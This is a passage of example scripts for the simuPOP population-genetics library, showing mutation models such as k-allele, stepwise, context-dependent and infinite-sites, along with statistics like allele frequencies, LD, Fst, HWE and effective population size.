sim.InitGenotype(freq=[0.2, 0.3, 0.5])\n ],\n preOps=sim.MatrixMutator(rate = [\n [0, 1e-5, 1e-5],\n [1e-4, 0, 1e-4],\n [1e-3, 1e-3, 0]\n ]),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0, step=100),\n sim.PyEval(r"', '.join(['%.3f' % alleleFreq[0][x] for x in range(3)]) + '\\n'",\n step=100),\n ],\n gen=1000\n)\n#end_file\n\n#begin_file log/KAlleleMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000], loci=1*3)\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.KAlleleMutator(k=5, rates=[1e-2, 1e-3], loci=[0, 1]),\n sim.Stat(alleleFreq=range(3), step=100),\n sim.PyEval(r"', '.join(['%.3f' % alleleFreq[x][0] for x in range(3)]) + '\\n'",\n step=100),\n ],\n 
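# under the k-allele model each mutation event changes an allele to one of the\n # other k-1 allelic states with equal probability; locus 2 never mutates here\n 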
gen=500\n)\n#end_file\n\n#begin_file log/SNPMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000], loci=[1, 1], lociNames=['A', 'B'],\n infoFields='fitness')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n sim.SNPMutator(u=0.001),\n sim.MaSelector(loci='A', fitness=[1, 0.99, 0.98]),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=['A', 'B'], step=100),\n sim.PyEval(r"'%.3f\\t%.3f\\n' % (alleleFreq[0][1], alleleFreq[1][1])",\n step=100),\n ],\n gen=500\n)\n#end_file\n\n#begin_file log/AcgtMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000], loci=1,\n alleleNames=['A', 'C', 'G', 'T'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.1, .1, .1, .7])\n ],\n matingScheme=sim.RandomMating(),\n preOps=[\n sim.AcgtMutator(rate=[1e-4, 0.5], model='K80'),\n sim.Stat(alleleFreq=0, step=100),\n sim.PyEval(r"', '.join(['%.3f' % alleleFreq[0][x] for x in range(4)]) + '\\n'",\n step=100),\n ],\n gen=500\n)\n#end_file\n\n#begin_file log/StepwiseMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=1000, loci=[1, 1])\npop.evolve(\n # all start from allele 50\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq= [0]*50 + [1])\n ],\n matingScheme=sim.RandomMating(),\n preOps=[\n sim.StepwiseMutator(rates=1e-3, loci=0),\n sim.StepwiseMutator(rates=1e-3, incProb=0.6, loci=1,\n mutStep=(sim.GEOMETRIC_DISTRIBUTION, 0.2)),\n ],\n gen=100\n)\n# count the average number of tandem repeats at both loci\ncnt0 = cnt1 = 0\nfor ind in pop.individuals():\n cnt0 += ind.allele(0, 0) + ind.allele(0, 1)\n cnt1 += ind.allele(1, 0) + ind.allele(1, 1)\n\nprint('Average number of repeats at two loci are %.2f and %.2f.' % \\\n (cnt0/2000., cnt1/2000.))\n#end_file\n\n#begin_file log/PyMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\ndef incAllele(allele):\n return allele + random.randint(1, 5)\n\npop = sim.Population(size=1000, loci=[20])\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(),\n postOps=sim.PyMutator(func=incAllele, rates=[1e-4, 1e-3],\n loci=[2, 10]),\n gen = 1000\n)\n# count the average number of tandem repeats at both loci\ndef avgAllele(pop, loc):\n ret = 0\n for ind in pop.individuals():\n ret += ind.allele(loc, 0) + ind.allele(loc, 1)\n return ret / (pop.popSize() * 2.)\n\nprint('Average number of repeats at two loci are %.2f and %.2f.' 
% \\\n (avgAllele(pop, 2), avgAllele(pop, 10)))\n#end_file\n\n#begin_file log/MixedMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(5000, loci=[1, 1])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[50, 50])\n ],\n preOps=[\n # the first locus uses a pure stepwise mutation model\n sim.StepwiseMutator(rates=0.001, loci=0),\n # the second locus uses a mixed model\n sim.MixedMutator(rates=0.001, loci=1, mutators=[ \n sim.KAlleleMutator(rates=1, k=100),\n sim.StepwiseMutator(rates=1)\n ], prob=[0.1, 0.9])],\n matingScheme=sim.RandomMating(),\n gen = 20\n)\n# what alleles are there?\ngeno0 = []\ngeno1 = []\nfor ind in pop.individuals():\n geno0.extend([ind.allele(0, 0), ind.allele(0, 1)])\n geno1.extend([ind.allele(1, 0), ind.allele(1, 1)])\n\nprint('Locus 0 has alleles', ', '.join([str(x) for x in set(geno0)]))\nprint('Locus 1 has alleles', ', '.join([str(x) for x in set(geno1)]))\n#end_file\n\n#begin_file log/ContextMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(5000, loci=[3, 3])\npop.evolve(\n # initialize locus by 0, 0, 0, 1, 0, 1\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 1], loci=[3, 5])\n ],\n preOps=[\n sim.ContextMutator(mutators=[\n sim.SNPMutator(u=0.1),\n sim.SNPMutator(u=1),\n ],\n contexts=[(0, 0), (1, 1)],\n loci=[1, 4],\n rates=0.01\n ),\n sim.Stat(alleleFreq=[1, 4], step=5),\n sim.PyEval(r\"'Gen: %2d freq1: %.3f, freq2: %.3f\\n'\" + \n \" % (gen, alleleFreq[1][1], alleleFreq[4][1])\", step=5)\n ], \n matingScheme=sim.RandomMating(),\n gen = 20\n)\n#end_file\n\n#begin_file log/pyContextMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(5000, loci=[3, 3])\ndef contextMut(allele, context):\n if context == [0, 0]:\n if allele == 0 and random.random() < 0.1:\n return 1\n elif context == [1, 1]:\n if allele == 0:\n return 1\n # do not mutate\n return allele\n\npop.evolve(\n # initialize locus by 0, 0, 0, 1, 0, 1\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 1], loci=[3, 5])\n ],\n preOps=[\n sim.PyMutator(func=contextMut, context=1,\n loci=[1, 4], rates=0.01\n ),\n #sim.SNPMutator(u=0.01, v= 0.01, loci=[1, 4]),\n sim.Stat(alleleFreq=[1, 4], step=5),\n sim.PyEval(r\"'Gen: %2d freq1: %.3f, freq2: %.3f\\n'\" + \n \" % (gen, alleleFreq[1][1], alleleFreq[4][1])\", step=5)\n ], \n matingScheme=sim.RandomMating(),\n gen = 20\n)\n#end_file\n\n#begin_file log/PointMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=1, infoFields='fitness')\npop.evolve(\n initOps=sim.PyOutput('Introducing alleles at generation'),\n preOps=sim.MaSelector(loci=0, wildtype=0, fitness=[1, 1.05, 1.1]),\n matingScheme=sim.RandomSelection(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.IfElse('alleleNum[0][1] == 0', ifOps=[\n sim.PyEval(r\"' %d' % gen\"),\n sim.PointMutator(inds=0, loci=0, allele=1),\n ]),\n sim.IfElse('alleleFreq[0][1] > 0.05', ifOps=[\n sim.PyEval(r\"'.\\nTerminate at generation %d at allele freq %.3f.\\n'\" +\n \" % (gen, alleleFreq[0][1])\"),\n sim.TerminateIf('True'),\n ])\n 
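# together, the two IfElse operators re-introduce allele 1 whenever it is lost\n # and terminate the run once the advantageous allele exceeds frequency 0.05\n 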
],\n)\n#end_file\n\n#begin_file log/mutatorVSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef fragileX(geno):\n '''A disease model where an individual has an increased risk of\n being affected if the number of tandem repeats exceeds 50.\n '''\n # Alleles A1, A2.\n maxRep = max(geno)\n if maxRep < 50:\n return 0\n else:\n # individuals with allele >= 70 will surely be affected\n return min(1, (maxRep - 50)*0.05)\n\ndef avgAllele(pop):\n 'Get average allele by affection status.'\n sim.stat(pop, alleleFreq=(0,1), subPops=[(0,0), (0,1)],\n numOfAffected=True, vars=['alleleNum', 'alleleNum_sp'])\n avg = []\n for alleleNum in [\\\n pop.dvars((0,0)).alleleNum[0], # first locus, unaffected\n pop.dvars((0,1)).alleleNum[0], # first locus, affected\n pop.dvars().alleleNum[1], # second locus, overall\n ]:\n alleleSum = numAllele = 0\n for idx,cnt in enumerate(alleleNum):\n alleleSum += idx * cnt\n numAllele += cnt\n if numAllele == 0:\n avg.append(0)\n else:\n avg.append(alleleSum * 1.0 /numAllele)\n # unaffected, affected, loc2\n pop.dvars().avgAllele = avg\n return True\n\npop = sim.Population(10000, loci=[1, 1])\npop.setVirtualSplitter(sim.AffectionSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[50, 50])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n # determine affection status for each offspring (duringMating)\n sim.PyPenetrance(func=fragileX, loci=0),\n # the second, unrelated locus mutates in all offspring; rate is high to save some time\n sim.StepwiseMutator(rates=1e-3, loci=1),\n # unaffected offspring, mutation rate is high to save some time\n sim.StepwiseMutator(rates=1e-3, loci=0, subPops=[(0, 0)]),\n # affected offspring have high probability of mutating upward\n sim.StepwiseMutator(rates=1e-2, loci=0, subPops=[(0, 1)],\n incProb=0.7, mutStep=3),\n # calculate average number of repeats\n sim.PyOperator(func=avgAllele, step=20),\n sim.PyEval(r"'Gen: %3d #Aff: %d AvgRepeat: %.2f (unaff), %.2f (aff), %.2f (unrelated)\\n'"\n + " % (gen, numOfAffected, avgAllele[0], avgAllele[1], avgAllele[2])",\n step=20),\n ],\n gen = 101\n)\n#end_file\n\n#begin_file log/alleleMapping.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000], loci=1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0]*4 + [0.1, 0.2, 0.3, 0.4])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.KAlleleMutator(k=4, rates=1e-4, mapIn=[0]*4 + list(range(4)),\n mapOut=[4, 5, 6, 7]),\n sim.Stat(alleleFreq=0, step=100),\n sim.PyEval(r"', '.join(['%.2f' % alleleFreq[0][x] for x in range(8)]) + '\\n'",\n step=100),\n ],\n gen=500\n)\n#end_file\n\n#begin_file log/infiniteSites.py\nimport simuOpt\nsimuOpt.setOptions(alleleType='long')\n#begin_ignore\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\ndef infSitesMutate(pop, param):\n '''Apply an infinite sites mutation model'''\n (startPos, endPos, rate) = param\n # for each individual\n for ind in pop.individuals():\n # for each homologous copy of chromosomes\n for p in range(2):\n # using a geometric distribution to determine\n # the first mutation location\n loc = sim.getRNG().randGeometric(rate)\n # if a mutation happens, record the mutated location\n if startPos + loc < endPos:\n try:\n # find the first unused (zero) slot\n idx = 
ind.genotype(p).index(0)\n # record mutation here\n ind.setAllele(startPos + loc, idx, ploidy=p)\n except ValueError:\n # no empty slot is left to record this mutation\n print('Warning: more than %d mutations have accumulated' % pop.totNumLoci())\n return True\n\npop = sim.Population(size=[2000], loci=[100])\npop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n # mutate in a 10Mb region at rate 1e-8\n sim.PyOperator(func=infSitesMutate, param=(1, 10000000, 1e-8)),\n ],\n matingScheme=sim.RandomMating(),\n gen = 100\n)\n# now we have an evolved population. Let us have a look at the 'alleles'.\n# print the first five mutation locations\nprint(pop.individual(0).genotype()[:5])\n# how many alleles are there (does not count 0)?\nprint(len(set(pop.genotype())) - 1)\n# count the number of copies of each non-zero allele.\ncnt = {}\nfor allele in pop.genotype():\n if allele == 0:\n continue\n if allele in cnt:\n cnt[allele] += 1\n else:\n cnt[allele] = 1\n\n# highest allele frequency?\nprint(max(cnt.values()) *0.5 / pop.popSize())\n#end_file\n\n\n#begin_file log/countMutants.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom collections import defaultdict\n# count number of mutants at each locus\ncounter = defaultdict(int)\ndef countMutants(mutants):\n global counter\n for line in mutants.split('\\n'):\n # a trailing \\n will lead to an empty string\n if not line: \n continue\n (gen, loc, ploidy, a1, a2, ind_id) = line.split('\\t')\n counter[int(loc)] += 1\n\npop = sim.Population([5000]*3, loci=[2,1,1], infoFields='ind_id',\n chromTypes=[sim.AUTOSOME, sim.CHROMOSOME_X, sim.CHROMOSOME_Y])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.IdTagger(),\n ],\n preOps=[\n sim.KAlleleMutator(rates=[0.001] + [0.01]*3,\n loci=range(4), k=100, output=countMutants),\n ],\n matingScheme=sim.RandomMating(\n ops=[\n sim.IdTagger(),\n sim.MendelianGenoTransmitter()\n ]),\n gen = 10\n)\nprint(counter.items())\n#end_file\n\n\n\n#begin_file log/statSuffix.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([5000]*3, loci=5)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(structure=range(5), subPops=(0, 1), suffix='_01', step=40),\n sim.Stat(structure=range(5), subPops=(1, 2), suffix='_12', step=40),\n sim.Stat(structure=range(5), subPops=(0, 2), suffix='_02', step=40),\n sim.Stat(structure=range(5), step=40),\n sim.PyEval(r"'Fst=%.3f (pairwise: %.3f %.3f %.3f)\\n' % (F_st, F_st_01, F_st_12, F_st_02)",\n step=40),\n ],\n gen = 200\n)\n#end_file\n\n#begin_file log/statCount.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10000, loci=1)\npop.setVirtualSplitter(sim.CombinedSplitter(\n [sim.SexSplitter(), sim.AffectionSplitter()]))\nsim.initSex(pop)\nsim.initGenotype(pop, freq=[0.2, 0.8])\nsim.maPenetrance(pop, loci=0, penetrance=[0.1, 0.2, 0.5])\n# Count population size\nsim.stat(pop, popSize=True, subPops=[(0, 0), (0, 2)])\n# popSize is the combined size of the two VSPs and does not equal the total population size.\n# Because the two VSPs overlap (all males and all unaffected), popSize can be\n# greater than the real population size.\nprint(pop.dvars().subPopSize, pop.dvars().popSize)\n# print popSize of each virtual 
subpopulation.\nsim.stat(pop, popSize=True, subPops=[(0, 0), (0, 2)], vars='popSize_sp')\n# Note the two ways to access variables in (virtual) subpopulations.\nprint(pop.dvars((0,0)).popSize, pop.dvars().subPop[(0,2)]['popSize'])\n# Count the number of males (should be the same as the size of VSP (0,0)).\nsim.stat(pop, numOfMales=True)\nprint(pop.dvars().numOfMales)\n# Count the number of unaffected and affected male individuals\nsim.stat(pop, numOfMales=True, subPops=[(0, 2), (0, 3)], vars='numOfMales_sp')\nprint(pop.dvars((0,2)).numOfMales, pop.dvars((0,3)).numOfMales)\n# or the number of affected males and females\nsim.stat(pop, numOfAffected=True, subPops=[(0, 0), (0, 1)], vars='numOfAffected_sp')\nprint(pop.dvars((0,0)).numOfAffected, pop.dvars((0,1)).numOfAffected)\n# These can also be done using a sim.ProductSplitter...\npop.setVirtualSplitter(sim.ProductSplitter(\n [sim.SexSplitter(), sim.AffectionSplitter()]))\nsim.stat(pop, popSize=True, subPops=[(0, x) for x in range(4)])\n# counts for male unaffected, male affected, female unaffected and female affected\nprint(pop.dvars().subPopSize)\n#end_file\n\n\n#begin_file log/statNumOfSegSites.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=[1]*100)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.3, 0.7]),\n sim.PyOutput('#all 0\\t#seg sites\\t#all 1\\n'),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(numOfSegSites=sim.ALL_AVAIL,\n vars=['numOfSegSites', 'numOfFixedSites']),\n sim.PyEval(r'"%d\\t%d\\t%d\\n" % (100-numOfSegSites-numOfFixedSites,'\n 'numOfSegSites, numOfFixedSites)',\n step=50)\n ],\n gen=500\n)\n# output a list of segregating sites\nsim.stat(pop, numOfSegSites=sim.ALL_AVAIL, vars='segSites')\nprint(pop.dvars().segSites)\n#end_file\n\n\n#begin_file log/statAlleleFreq.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10000, loci=1)\npop.setVirtualSplitter(sim.AffectionSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(loci=0, freq=[0.8, 0.2])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.MaPenetrance(penetrance=[0.1, 0.4, 0.6], loci=0),\n sim.Stat(alleleFreq=0, subPops=[(0, 0), (0, 1)],\n vars=['alleleFreq', 'alleleFreq_sp']),\n sim.PyEval(r"'Gen: %d, freq: %.2f, freq (aff): %.2f, freq (unaff): %.2f\\n' % " + \\\n "(gen, alleleFreq[0][1], subPop[(0,1)]['alleleFreq'][0][1]," + \\\n "subPop[(0,0)]['alleleFreq'][0][1])"),\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/statGenoFreq.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=[1, 1, 1], lociNames=['A', 'X', 'Y'],\n chromTypes=[sim.AUTOSOME, sim.CHROMOSOME_X, sim.CHROMOSOME_Y])\nsim.initGenotype(pop, freq=[0.01, 0.05, 0.94])\nsim.stat(pop, genoFreq=['A', 'X']) # both locus indices and names can be used.\nprint('Available genotypes on autosome:', list(pop.dvars().genoFreq[0].keys()))\nfor i in range(3):\n for j in range(3):\n print('%d-%d: %.3f' % (i, j, pop.dvars().genoFreq[0][(i,j)]))\n\nprint('Genotype frequency on chromosome X:\\n', \\\n '\\n'.join(['%s: %.3f' % (x,y) for x,y in pop.dvars().genoFreq[1].items()]))\n#end_file\n\n#begin_file log/statHeteroFreq.py\n#begin_ignore\nimport 
simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(heteroFreq=0, step=10),\n sim.PyEval(r\"'Gen: %d, HeteroFreq: %.2f\\n' % (gen, heteroFreq[0])\", step=20)\n ],\n gen = 100\n)\n#end_file\n\n#begin_file log/statHaploFreq.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import viewVars\npop = sim.Population(100, loci=3)\nsim.initGenotype(pop, freq=[0.2, 0.4, 0.4], loci=0)\nsim.initGenotype(pop, freq=[0.2, 0.8], loci=2)\nsim.stat(pop, genoFreq=[0, 1, 2], haploFreq=[0, 1, 2],\n vars=['genoNum', 'haploFreq'])\nviewVars(pop.vars(), gui=False)\n#end_file\n\n#begin_file log/statInfo.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population([500], infoFields='anc')\n# Defines VSP 0, 1, 2, 3, 4 by anc.\npop.setVirtualSplitter(sim.InfoSplitter('anc', cutoff=[0.2, 0.4, 0.6, 0.8]))\n#\npop.evolve(\n initOps=[\n sim.InitSex(),\n # anc is 0 or 1\n sim.InitInfo(lambda : random.randint(0, 1), infoFields='anc')\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.InheritTagger(mode=sim.MEAN, infoFields='anc')\n ]),\n postOps=[\n sim.Stat(popSize=True, meanOfInfo='anc', varOfInfo='anc',\n subPops=[(0, sim.ALL_AVAIL)]),\n sim.PyEval(r\"'Anc: %.2f (%.2f), #inds: %s\\n' %\" + \\\n \"(meanOfInfo['anc'], varOfInfo['anc'], \" + \\\n \"', '.join(['%4d' % x for x in subPopSize]))\")\n ],\n gen = 5,\n)\n#end_file\n\n#begin_file log/statLD.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([1000]*2, loci=3)\nsim.initGenotype(pop, freq=[0.2, 0.8], subPops=0)\nsim.initGenotype(pop, freq=[0.8, 0.2], subPops=1)\nsim.stat(pop, LD=[[0, 1, 0, 0], [1, 2]],\n vars=['LD', 'LD_prime', 'R2', 'LD_ChiSq', 'LD_ChiSq_p', 'CramerV',\n 'LD_prime_sp', 'LD_ChiSq_p_sp'])\nfrom pprint import pprint\npprint(pop.vars())\n#end_file\n\n#begin_file log/statAssociation.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import *\nfrom simuPOP.sampling import drawCaseControlSample\ndef assoTest(pop):\n 'Draw case-control sample and apply association tests'\n sample = drawCaseControlSample(pop, cases=500, controls=500)\n sim.stat(sample, association=(0, 2), vars=['Allele_ChiSq_p', 'Geno_ChiSq_p', 'Armitage_p'])\n print('Allele test: %.2e, %.2e, Geno test: %.2e, %.2e, Trend test: %.2e, %.2e' \\\n % (sample.dvars().Allele_ChiSq_p[0], sample.dvars().Allele_ChiSq_p[2],\n sample.dvars().Geno_ChiSq_p[0], sample.dvars().Geno_ChiSq_p[2],\n sample.dvars().Armitage_p[0], sample.dvars().Armitage_p[2]))\n return True\n\npop = sim.Population(size=100000, loci=3)\npop.setVirtualSplitter(sim.ProportionSplitter([0.5, 0.5]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*3, subPops=[(0,0)]),\n sim.InitGenotype(genotype=[1]*3, subPops=[(0,1)]),\n ],\n matingScheme=sim.RandomMating(ops=sim.Recombinator(loci=[0, 1], rates=[0.01, 0.005])),\n postOps=[\n 
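# the penetrance operator below assigns disease status at the middle\n # locus; loci 0 and 2 are linked markers whose association with the\n # disease is then tested in repeated case-control samples\n 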
sim.MaPenetrance(loci=1, penetrance=[0.1, 0.2, 0.4]),\n sim.PyOperator(func=assoTest, step=20),\n ],\n gen = 100\n)\n#end_file\n\n#begin_file log/statStructure.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import migrIslandRates\nsimu = sim.Simulator(sim.Population([5000]*3, loci=10, infoFields='migrate_to'),\n rep=2)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n preOps=sim.Migrator(rate=migrIslandRates(0.01, 3), reps=1),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(structure=range(10), step=40),\n sim.PyEval(\"'Fst=%.3f (rep=%d without migration) ' % (F_st, rep)\", step=40, reps=0),\n sim.PyEval(\"'Fst=%.3f (rep=%d with migration) ' % (F_st, rep)\", step=40, reps=1),\n sim.PyOutput('\\n', reps=-1, step=40)\n ],\n gen = 200\n)\n#end_file\n\n#begin_file log/statHWE.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([1000], loci=1)\npop.setVirtualSplitter(sim.ProportionSplitter([0.4, 0.4, 0.2]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0,0], subPops=[(0,0)]),\n sim.InitGenotype(genotype=[0,1], subPops=[(0,1)]),\n sim.InitGenotype(genotype=[1,1], subPops=[(0,2)]),\n ],\n preOps=[\n sim.Stat(HWE=0, genoFreq=0),\n sim.PyEval(r'\"HWE p-value: %.5f (AA: %.2f, Aa: %.2f, aa: %.2f)\\n\" % (HWE[0], '\n 'genoFreq[0][(0,0)], genoFreq[0][(0,1)] + genoFreq[0][(1,0)], genoFreq[0][(1,1)])'),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(HWE=0, genoFreq=0),\n sim.PyEval(r'\"HWE p-value: %.5f (AA: %.2f, Aa: %.2f, aa: %.2f)\\n\" % (HWE[0], '\n 'genoFreq[0][(0,0)], genoFreq[0][(0,1)] + genoFreq[0][(1,0)], genoFreq[0][(1,1)])'),\n ],\n gen = 1\n)\n#end_file\n\n#begin_file log/statIBD.py\nimport simuOpt\nsimuOpt.setOptions(alleleType='lineage')\n#begin_ignore\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\n#sim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([500], loci=[1]*100)\npop.evolve(\n initOps=[\n sim.InitLineage(),\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2]*5),\n ],\n preOps=[\n sim.Stat(inbreeding=sim.ALL_AVAIL, popSize=True, step=10),\n sim.PyEval(r'\"gen %d: IBD freq %.4f, IBS freq %.4f, est: %.4f\\n\" % '\n '(gen, sum(IBD_freq.values()) /len(IBD_freq), '\n ' sum(IBS_freq.values()) /len(IBS_freq), '\n ' 1 - (1-1/(2.*popSize))**gen)', step=10)\n ],\n matingScheme=sim.RandomMating(),\n gen = 100\n)\n#end_file\n\n\n\n\n#begin_file log/statNeDemographic.py\nimport simuOpt\nsimuOpt.setOptions(alleleType='lineage', quiet=True)\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2000], loci=[1]*3,\n chromTypes=[sim.AUTOSOME, sim.CHROMOSOME_X, sim.CHROMOSOME_Y])\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.3, 0.7]),\n ],\n preOps=[\n sim.Stat(effectiveSize=range(3), subPops=[0, (0,0), (0,1)],\n vars='Ne_demo_base_sp'),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(effectiveSize=range(3), subPops=[0, (0,0), (0,1)],\n vars='Ne_demo_sp'),\n sim.PyEval(r'\"Demographic Ne: %.1f (auto), %.1f (X), %.1f (Y), '\n r'Males: %.1f, %.1f, %.1f, Females: %.1f, %.1f, %.1f\\n\"'\n '% tuple([subPop[0][\"Ne_demo\"][x] for x in (0, 1, 2)] + '\n '[subPop[(0,0)][\"Ne_demo\"][x] for x in (0, 1, 2)] + '\n 
